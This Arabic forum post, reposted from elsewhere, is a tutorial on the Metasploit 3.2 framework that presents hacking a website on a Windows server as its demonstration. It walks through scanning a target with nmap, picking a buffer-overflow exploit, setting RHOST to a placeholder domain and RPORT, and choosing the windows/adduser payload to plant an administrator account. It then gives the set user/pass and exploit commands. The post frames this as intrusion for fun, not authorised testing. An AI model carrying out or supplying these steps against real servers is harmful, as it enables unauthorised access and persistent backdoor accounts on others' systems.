اخباركم..؟ يا حلوييين..؟ عساكم ع القوة...؟ <<<مادوك تتدخل في الموضوع

سبب الطرح..قوة الاداة من عده نواحي..اثبات جدارتها واحتلالها مراتب افضل 10 برامج اختراق مفتوحة

المصدر (مجانية)http://www.****sploit.com/framework/ ..(اخر اصدار 3.2)
الكلمه المشفره m-e-t-a
بعدة نسخة متوفرة لجميع الانظمة ..اما من ناحية التثبيت ..تثبت كأي برنامج اخر..ومرفق مع الاداة

عده ادوات اخري مساعده في الاختراق مثل اداة nmap وسيظهر اثناء التثبيت سؤال اختياري لتثبيت

الادوات المرفقة..نشرح بعض مميزات الاداة :



طبعا هناك طريقتين لاستخدام البرنامج :

الاولي ..ولكن انا شخصيا لا افضلها لان البرنامج سيتعرف تلقائيا علي لغة الجهاز..(عربي )

وستواجه مشاكل اللغة مع البرنامج..والشرح سيتم علي الطريقة الثانية ..




الثانية ..سيقوم البرنامج بانشاء سيرفر وهمي محلي ..واستخدامه مع امكانية تحكم غير محدودة

بخيارات..طرق ومميزات مذهلة ..وهي m-e-t-a-s-p-l-o-i-t *** 3 تحصلها من الستارت




شاهد عنوان الويب في الاعلي :

اقتباس:
http://127.0.0.1:55555/

يستخدم لوكال هوست من البورت 55555

وهذه هي الصورة الرئيسية للبرنامج ..



طيب احنا قلنا ..الموضوع متجدد ..وسيتم متابعه الموضوع يوميا ..انا اعطيت لمحة سريعة عن البرنامج


طيب حتي نعرف فوائد البرنامج ناخذ نظرة سريعة ع الطاير ونخترق موقع مثلا نختار موقع علي سيرفر


ويندوز..لانه في ناس بتكره سيرفرات الويندوز وبقولوا انه مستحيل اختراقها ..


ناخذ نظرة علي شل البرنامج CONSOLE



طبعا هذا المهم عندنا ..ناخذ اوامره كاملة:



طبعا هذه الاوامر المستخدمة كاملة مع شرح وظيفتها مقابل كل امر..


طيب سبق وقلنا انه يرفق مع الاداة برنامج فاحص المواقع الشهير nmap

انا فحت الموقع المراد بالبرنامج وعرفت البرامج الي مركبها ..مع بورتات كل برنامج مركب علي السيرفر..

نشوف طريقة الاستغلال ..



زي ما انتوا شايفين طبعا الثغرة من ثغرات البفر (الفيض ) نستخدمها هي طبعا ..نظغط عليها ونشوف



طبعا بعد فحص الموقع ومنافذه بالبرنامج nmap وجدت البورت الاتي ..الذي ساقوم بوضعه في الاستغلال


شاهد الاتي ..عند الضغط علي الاستغلال المطلوب يطلب منك ادخال البيانات حسب نوع الثغرة ..






نكتب الامر الاتي :

اقتباس:
show options




الان نستخدم الامر SET لتاكيد الهدف مع البورت بالطريقة الاتية..

اقتباس:
SET RHOST WWW.XXXX.COM


و




SET RPORT رقم البورت



وطبعا الان ننتقل الي الامر التالي

اقتباس:
show payloads



طبعا انا ساختار التالية

اقتباس:
windows/adduser
لاسباب انا افضلها ..لسيرفرات الويندوز يفضل اضافة يوزر ..بصلاحيات مدير حتي يكون اللعب افضل


بالسيرفر



بالامر التالي:

اقتباس:
set payload windows/adduser



اقتباس:
نرجع للامر التالي ..show options



بالامر التالي لليوزر والباس..

اقتباس:
set user anti-trust




set pass anti-trust





نعطي الان الامر السابق show options لنشاهد التاكيد علي الامر السابق ..




بقي الان امر واحد لاتمام الاختراق ..بعد الانتهاء من جميع الخطوات ..

اقتباس:
exploit



طبعا هذا بالنسبة لاضافة يوزر في سيرفرات الويندوز..
================

][ لآ تنسـوٍِن التقيييم ][ لآهنـتـِوٍِ




منقول للفائده